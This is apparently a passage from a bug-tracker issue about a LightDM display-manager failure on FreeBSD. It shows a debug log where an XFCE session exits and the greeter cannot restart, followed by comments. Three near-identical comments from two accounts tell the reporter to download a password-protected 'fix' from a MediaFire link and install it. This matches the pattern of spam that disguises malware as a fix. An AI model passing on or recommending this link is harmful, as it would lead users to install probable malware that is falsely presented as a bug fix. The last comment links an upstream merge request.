[+1709.38s] DEBUG: Session pid=31730: Logging to /var/log/lightdm/xdmcp5-greeter.log
[+1709.38s] DEBUG: Activating ConsoleKit session fbsd14-1725075208.571510-272946910
[+1709.38s] WARNING: Error activating ConsoleKit session: GDBus.Error:org.freedesktop.ConsoleKit.Session.Error.NotSupported: Activation is not supported for this kind of seat
[+1710.36s] DEBUG: Greeter connected version=1.32.0 api=1 resettable=false
[+1710.48s] DEBUG: Greeter start authentication for larry
[+1710.48s] DEBUG: Session: Not setting XDG_VTNR
[+1710.48s] DEBUG: Session pid=39244: Started with service 'lightdm', username 'larry'
[+1710.48s] DEBUG: Session pid=39244: Got 1 message(s) from PAM
[+1710.48s] DEBUG: Prompt greeter with 1 message(s)
[+1723.18s] DEBUG: Continue authentication
[+1723.19s] DEBUG: Session pid=39244: Authentication complete with return value 0: Success
[+1723.19s] DEBUG: Authenticate result for user larry: Success
[+1723.19s] DEBUG: User larry authorized
[+1723.43s] DEBUG: Greeter requests session xfce
[+1723.43s] DEBUG: Seat xdmcp5: Stopping greeter; display server will be re-used for user session
[+1723.43s] DEBUG: Session pid=31730: Sending SIGTERM
[+1723.45s] DEBUG: Greeter closed communication channel
[+1723.45s] DEBUG: Session pid=31730: Exited with return value 0
[+1723.45s] DEBUG: Seat xdmcp5: Session stopped
[+1723.45s] DEBUG: Seat xdmcp5: Greeter stopped, running session
[+1723.45s] DEBUG: Registering session with bus path /org/freedesktop/DisplayManager/Session5
[+1723.45s] DEBUG: Session pid=39244: Not setting XDG_VTNR
[+1723.45s] DEBUG: Session pid=39244: Running command /usr/local/etc/lightdm/Xsession startxfce4
[+1723.45s] DEBUG: Session pid=39244: Logging to .xsession-errors
[+1723.45s] DEBUG: Activating ConsoleKit session fbsd14-1725075222.641331-595595591
[+1723.45s] WARNING: Error activating ConsoleKit session: GDBus.Error:org.freedesktop.ConsoleKit.Session.Error.NotSupported: Activation is not supported for this kind of seat
[+1792.60s] DEBUG: Session pid=39244: Exited with return value 1
[+1792.60s] DEBUG: Seat xdmcp5: Session stopped
[+1792.60s] DEBUG: Seat xdmcp5: Stopping display server, no sessions require it
[+1792.60s] DEBUG: Seat xdmcp5: Display server stopped
[+1792.60s] DEBUG: Seat xdmcp5: Active display server stopped, starting greeter
[+1792.60s] DEBUG: Seat xdmcp5: Creating greeter session
[+1792.60s] DEBUG: Seat xdmcp5: Creating display server of type x
[+1792.60s] DEBUG: Seat xdmcp5: Stopping; failed to start a greeter
[+1792.60s] DEBUG: Seat xdmcp5: Stopping
[+1792.60s] DEBUG: Seat xdmcp5: Stopping session
[+1792.60s] DEBUG: Seat xdmcp5: Session stopped
[+1792.60s] DEBUG: Seat xdmcp5: Stopped
[+1835.73s] DEBUG: Timing out unmanaged session 60759
```

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by jeremyhu** [comment]
https://gitlab.freedesktop.org/xorg/xserver/-/merge_requests/2277
